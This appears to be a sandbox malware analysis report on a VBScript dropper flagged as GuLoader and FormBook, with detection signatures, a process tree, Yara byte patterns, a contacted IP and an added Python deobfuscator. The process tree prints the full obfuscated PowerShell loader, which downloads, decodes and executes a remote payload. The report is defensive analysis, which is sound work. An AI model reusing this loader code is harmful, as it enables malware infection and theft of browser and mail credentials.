
Windows Analysis Report
6 654398.vbs

Overview

General Information

Sample name: 6 654398.vbs (renamed because original name is a hash value)
Original sample name: 654398.vbs
Analysis ID: 1539343
MD5: 2270731a281cd40f18f75b69a308207d
SHA1: b4d8bc01ca3ef042e7c4839edc21967bd735e1fc
SHA256: dbe9edac7d02e3a20e96ae4869966673cfa2505094c3ef06ca1250cffd097f5f
Tags: vbs, user-abuse_ch

Detection

FormBook, GuLoader
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Potential evasive VBS script found (sleep loop)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3872 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 3688 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. 
Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. 
tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6656 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: Ben1Grun3V sp1Su t.Land0St r)M,sc SupeGHandeCatac.uffkR cho Vau/Su c2 Car0 amp1Posi0Zirk0reg.1Fist0D ba1Vide F.anFSurviSengrMa,keRutef edeoEscaxLe b/Tild1incu3Para1Inde.Tryp0Brod ';$Teosofis=Naturvrdi 'M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ';$Soybean=Naturvrdi 'Reveh Fort.quat.usqpKultsPros:Pref/ Ko./UndewKat.wJazzw Uda.Sh,pgVermrP euoStoeuUdenpTh,or ambi S ea BrumPsyc.Ud ycPaapoPatemCopr/Fit.K P roiri,a ReplAfhji emtFeasiTermougr nLkkeeProprcyst.ComppUnsorBerrxId n>ArabhEmbltSarotKommp frssanti: Ent/Pu s/kalabS virDetau emtMo.sa.ent. 
iscp OlilMode/Be eKLeptoTe aaKruslcur.iFetct,araiEteroPourn OkkeCha rSi,h.CocrpSprkrtankx Mer>behnhlagdtRevatprofpSludsReso:Brug/Prop/ GeopOptar UndoPrepmTaviePrecnOps,t Lr eBerer dob.Actir IvesHaug/IrreKKineoPneua failTri,i RhatAnkei AveoSlatnveroeFeudrVeli.Sammpdownr .eixSnke ';$Knulling=Naturvrdi 'Geom>Bagg ';$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';$Deposito='Kalkudsivning';$Mantelet70='\spgelseshistories.Hov';Furnage (Naturvrdi 'Wo l$ RecgR maLsab OHersBParaAHelll Ind:LotaPSpisR AutEOpskd ,irIOvercFrs,AplanBMainlFiskePres=Trai$ FrieLat nBrunVDumb:Ban a Bo pHelmpPr dDi aiA.ntrtTor A.arr+Cloa$dioxmMechADiviNUdd Ttr,ne dlglOptiEDybstR ne7Lnko0Tegn ');Furnage (Naturvrdi 'Smas$PercGO erLSau OElanBHjemAT apLSkyg:Advio Oksp No.tHydrRUnfevU unL cceUdsvt Opp2E cr2Fors7Laud= H.r$ruelsI dvoOverYSoldBKorsEPunca prkN Abl.RvenStlpeptypolBetoIForetPaaf(,ekn$Unq kPutrnKittu klaLNondl.nami.oncnFibrG Vid)El e ');Furnage (Naturvrdi 'Stan[ CorNI che,angtOv r.TestSKo te ApprOm gV ridiAppecKrnieE tepBesgoAkmui Batn MiltUkrlM bacaSlannOphoaPolyG GkkeColpRHydr] ood:V gr: Ba SHogtEGramCSo oU,avnr.resiUndeTSympyYumaPI,terSkriO .agtSkreoU tac foroHammlPa.v Asc=Oplg Voic[SwilN.ilbePenkt in .Jap,S NuleImdeC dpaUUrsirUnfaiMissTDoo yInfiP T.ert ndOUndeT m,roCrazc K.lOCounLMou TReneYRuswP,ddeE yn]Neur:John:PaattPlumLR,acsEfte1Inte2F.os ');$Soybean=$Optrvlet227[0];$Afbrnde=(Naturvrdi 'Frek$ Un gUr nl BaloTetoBLimnASkolLEcze: .hikHeteaAwaksEnwik ForEBrutLPhonoKenit NegTAfb,eEarlrR.teNFor,EStubSReko=taenn Ceme Te WPart-Ve.dOtailBSvo j orteProgc R ntOpst BestsQuadyDialsMoritEdeleInusm dea.reden DumEBonntS.ve.splawTyraekr.mbEs iCHalvLEisei TraEUd aNSno T er ');Furnage ($Afbrnde);Furnage (Naturvrdi ' Ind$Inf kGermaAarssB usk.orge Fr l ostoRa.ct CogtSpaceN kor,mdrnPa ae.olysBibe. 
Ep,HMelleBa taTilmdR,mseYpperSheasSovs[Illi$Po fTKonseOpvaoFa isRe eosemifOpthiEk.kss,ad]Medb=Til.$ActiPInterRedaeRu prOpereDis c El.edel iCui vMedseDagsdTa.p ');$Gougers=Naturvrdi 'Over$ Ma k Nepa S nsShagka,daeSnazl preoPetrt MartTrosePrisrKlemnS.gee Blrs Sti.AmmiDOncoobitewMultnNonslP choMulkaSc rdWil FsoftiQuinlfej eR bi(pol,$BlomS VomoCenoyR dib Uk,e acsa Antn U i,G il$ Re.AHuzzdar eeIndgn A,tiU.spa Afs) Dat ';$Adenia=$Predicable;Furnage (Naturvrdi 'Beja$ nrogJo nLBy.goUddabGrowAUnatLL ep:MellpVandaSpintR coEA.toR UnnE No RVaarO bou=Wish(S.raTfolkeMtn s kaiTUnde- F rP.tera G lTM deHKok. Ho t$Reala egdMisse .ndnVarmiVibrA sno) ,le ');while (!$Paterero) {Furnage (Naturvrdi 'Dyn $Rom gS bllP rlosetlbLuftaUni l unk:GarbHNonvoAyunmOkkeoOvertBedvyUnfapSoire No = Div$And t Walr Paau Pa eAfho ') ;Furnage $Gougers;Furnage (Naturvrdi 'F,rns I dTDypkA Palr tret itn-,gissForyl Mane VirEDumhP Ma. Lir,4anac ');Furnage (Naturvrdi 'Eska$Ref gIndulSk hoSheabDra ASignlSlag:Kdg PGla AUnret HoseTrivRViscE owhr ippo F l= mn( OveTFa,lEDecoSTrinT mbr-BewrpKommA.ondtU laH ecu Kro$ RegaSt nD BrueBu gn RanIOrdkaSkin)Moly ') ;Furnage (Naturvrdi ' Grn$s,pegTi,tLFalhoCal bUnsaAMusalElev:GurlWS,biRSea I To,TTeg,hTeagE,ndeRFails roc5skob9lyri= Sap$ ,epGWithlPronO SymB S.aa Or.LMono: F.tA vkPSteapLiveRRnenEDeskHEmbaeTe eN ndSBeatiOvervS.awe LaaLUp.rYElek7I tu6Ma i+Bilt+S oo%Forp$Kaldo IndP NovTskovrJernVMesol Sube udrtBoga2Me a2Ambr7 kri.GasdCForsO vrdUStreN natKone ') ;$Soybean=$Optrvlet227[$Writhers59];}$Erholdnconceivably=340877;$Rensekremer=29893;Furnage (Naturvrdi ' Pr $Piscg GrolEbulo sagbCappAeffelStar:Ryddd ChudUnresSpges rsePGuntiM siR oapaPithlrad. 
tan=Unmi SquiGphleE verTSup.- pblcFrstoE.plNGlobTwhi EStpaNSkrit Sol Abvb$ b daC.ckdRetfeOxydN FreIMelaaSkar ');Furnage (Naturvrdi 'Lasi$Banagsen,lStatoBestb utaFo ul Fyr: V,nMVigtu S.jsTankkAgroeTrubl HermNiphaG.dlnwarrdPhag Id.= lyn Suba[,ponS Re yHjlpsVisutPolaeokkumCome.Sp,rC .ato,lebnPer.vOldheTuberCatktArch]pr d:ordi: StrFPolyrEmuloSon,mUvilBM taaPantsHalfeGlas6 Hyp4ArchS indt Forr buriFod.ns erg utd(Ank $ ncoDBe hdM.disH lisS.ssp meni LitrLavaaSnurlVedl) udd ');Furnage (Naturvrdi 'Phen$Prjsg N.rlPolyODustBBro,aForblRede: ForTFrihYIndtp Ry e .phSBackITypoTD.saUForbA Ba.tAppeIStr,o UndnF lkeKoenrGa e Efte=undi Bort[skydS InnY yrlsBli T mvuENonem Sam.Il.uT .uiENedvx Oritcere.UndeEAstrnelloC Lano EccDSchnIHydrNFalsg Bag]Inde:Unel:SvinALau sRehyCDistiBl.oIForn.Ind,gSupeENic tHumiSStorTPseurProai san,priG Jes(Mamm$Ta lM OutUDataS admkSou,EhandlOvermMis,AStalnKontdOpst)Deci ');Furnage (Naturvrdi ' rag$B.ttgQuerlRehyO Br B adAFoe,lK nt:unplOAdreupatrt pttBhuggIJakedPe,i=Zoot$Loe tKanoY roepRhodEc ugS KunI,oilt.mpouNoncaIn stpolyIoutdo ntanUnexESmu.RAvis.NonisWun U di.bSelvsKap,tAnguRFrisiWe rnPrisG Han( cou$FrakeAfspRSnooHTripOHaanLCourD s.anReduc eceoDuplNkoefcK.hoEFresI AanV KolASup bMi llKarbYVer ,Selv$d giRBoweeDeban MaxsRecte HexkAfblrSpovERe,sMProhe GymrDank)Uops ');Furnage $Outbid;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 1896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6640 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • GJFjqeGumqI.exe (PID: 616 cmdline: "C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdkey.exe (PID: 5636 cmdline: "C:\Windows\SysWOW64\cmdkey.exe" MD5: 6CDC8E5DF04752235D5B4432EACC81A8)
          • GJFjqeGumqI.exe (PID: 2576 cmdline: "C:\Program Files (x86)\zSizRDxEpxNzikSnvVoDapvfwUNDMCcTNpVzlWDDpfXwPOFFTmcolawpbwTKzXestfBidSHLZYc\GJFjqeGumqI.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7084 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
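Every string the powershell.exe stages above work with is produced by one helper: `Naturvrdi` walks its argument from index 4 in steps of 5 while the index stays below `Length - $varens` (the `$varens++` runs in the function's own scope, so it is 1 on every call) and returns the collected characters; `Furnage` then runs `& ($Brneballet) (...)`, and `$Brneballet` is itself a `Naturvrdi` literal. The Python below is an added example, not part of the Joe Sandbox report, that reimplements the decoder, builds constructed literals with the same layout for a round trip, and decodes four literals copied from the command line; `$Brneballet` comes out as `ieX`, so `Furnage` is Invoke-Expression on each decoded fragment. The longer literals are deliberately not decoded here, because the report rendering may have collapsed runs of spaces inside them.

```python
"""Added example (not part of the Joe Sandbox report): decoder for the
string obfuscation used by the PowerShell stage in the process tree.

The loader defines, with the names used on the page:

    function Naturvrdi($s){ ...; $Uenigst = $s.Length - $varens;
        for($i = 4; $i -lt $Uenigst; $i += 5){ $Lucuma += $s[$i] }; $Lucuma }
    function Furnage($c){ & ($Brneballet) ($c) }

$varens++ runs in the function's own scope, so $varens is 1 on every call and
the loop keeps s[4], s[9], s[14], ... while the index is below Length - 1.
Every real character is therefore preceded by four junk characters and each
literal ends with one padding character that is never read.
"""
import random
import re
import string


def naturvrdi_decode(s: str) -> str:
    """Python equivalent of Naturvrdi: every fifth character from offset 4,
    stopping before the trailing padding character."""
    return "".join(s[i] for i in range(4, len(s) - 1, 5))


def naturvrdi_encode(plain: str, seed: int = 1) -> str:
    """Build a literal with the same layout: four junk characters before each
    real one, then one padding character.  Constructed here only for
    round-trip testing; this encoder is not taken from the sample."""
    rng = random.Random(seed)
    alphabet = string.ascii_letters + " .,"
    out = []
    for ch in plain:
        out.append("".join(rng.choice(alphabet) for _ in range(4)))
        out.append(ch)
    out.append(" ")
    return "".join(out)


# Literals copied verbatim from the powershell.exe command line in the report.
PAGE_LITERALS = {
    "$Prereceived (first fragment)": "MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ",
    "$Teosofis": "M.deuSchnsMicrEbeboRSprn-TillaSandG hagE S.eNOpgatWaba ",
    "$Knulling": "Geom>Bagg ",
    "$Brneballet": "Hun iIncoeFri X Svu ",
}


def decode_page_literals() -> dict:
    """Decode the literals above.  $Brneballet yields 'ieX', so Furnage is
    '& iex <string>': Invoke-Expression on every decoded fragment."""
    return {name: naturvrdi_decode(lit) for name, lit in PAGE_LITERALS.items()}


# Matches  Naturvrdi '<single-quoted PowerShell literal>'  (a doubled '' escapes a quote).
NATURVRDI_CALL = re.compile(r"Naturvrdi\s+'((?:[^']|'')*)'")


def decode_script(fragment: str) -> str:
    """Rewrite every Naturvrdi '<literal>' call in a script fragment as a plain
    single-quoted string holding the decoded text, so the stage reads normally."""
    def replace(m: "re.Match") -> str:
        literal = m.group(1).replace("''", "'")
        return "'" + naturvrdi_decode(literal).replace("'", "''") + "'"
    return NATURVRDI_CALL.sub(replace, fragment)


if __name__ == "__main__":
    for name, value in decode_page_literals().items():
        print(f"{name:32} -> {value!r}")
    print(decode_script("$Brneballet=Naturvrdi 'Hun iIncoeFri X Svu ';Furnage $Outbid;"))
```

`decode_script` is the piece to run over the full command line once it has been recovered from an unmangled source (the AMSI capture or a process-creation event), since every `Furnage (Naturvrdi '...')` call then collapses to `Furnage ('<clear text>')` and the download, `User-Agent` handling and later `[System.Convert]::FromBase64String` step become readable.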
Source | Rule | Description | Author | Strings
0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3468115562.00000000033D0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000C.00000002.3466570701.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c240:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x142ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.2667370891.0000000008940000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security |
(18 entries in the full report; the remainder are not shown here)

Source | Rule | Description | Author | Strings
amsi64_7156.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
amsi32_6656.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
  • 0xc436:$b2: ::FromBase64String(
  • 0xb4c2:$s1: -join
  • 0x4c6e:$s4: +=
  • 0x4d30:$s4: +=
  • 0x8f57:$s4: +=
  • 0xb074:$s4: +=
  • 0xb35e:$s4: +=
  • 0xb4a4:$s4: +=
  • 0x152b8:$s4: +=
  • 0x15338:$s4: +=
  • 0x153fe:$s4: +=
  • 0x1547e:$s4: +=
  • 0x15654:$s4: +=
  • 0x156d8:$s4: +=
  • 0xbce1:$e4: Get-WmiObject
  • 0xbed0:$e4: Get-Process
  • 0xbf28:$e4: Start-Process
  • 0x15f43:$e4: Get-Process

          System Summary

Source: Process started. Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community. Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", ProcessId: 3872, ProcessName: wscript.exe
Source: Network Connection. Author: frack113. Data: DestinationIp: 199.103.62.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6640, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49988
Source: Process started. Author: Michael Haag. Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\6 654398.vbs", ProcessId: 3872, ProcessName: wscript.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Versfods Pudser Ringmrknings Gonitis Recuperability Saggio Doceret #>;$Homoplasy='Stenkulsnaftas';<#Rejicer Amanuensiser Manticory #>;$Feminisere=$Oversalts+$host.UI; function Naturvrdi($unmannerliness){If ($Feminisere) {$varens++;}$Uenigst=$Etymologiserendes+$unmannerliness.'Length'-$varens; for( $Erhold=4;$Erhold -lt $Uenigst;$Erhold+=5){$Generationsprojekters=$Erhold;$Lucuma+=$unmannerliness[$Erhold];$Bergensisk='Costively';}$Lucuma;}function Furnage($Lokummet){ & ($Brneballet) ($Lokummet);}$Prereceived=Naturvrdi 'MaliM atio Hi,zSp.liFibrlBagmlTilkaExte/Rytt ';$Prereceived+=Naturvrdi ' Kyl5R,ek.Bran0neut Fo b(bereWAfm i QuanFl.ld BrsoEstawUnlusC ch AppeNSpheT et Howd1Enek0Him .Flle0 tje;Repr Oxy WC diiSkadnBesk6Abor4Call;Fors FastxStem6gav.4Phan;St.u Prodr KiovGdni: 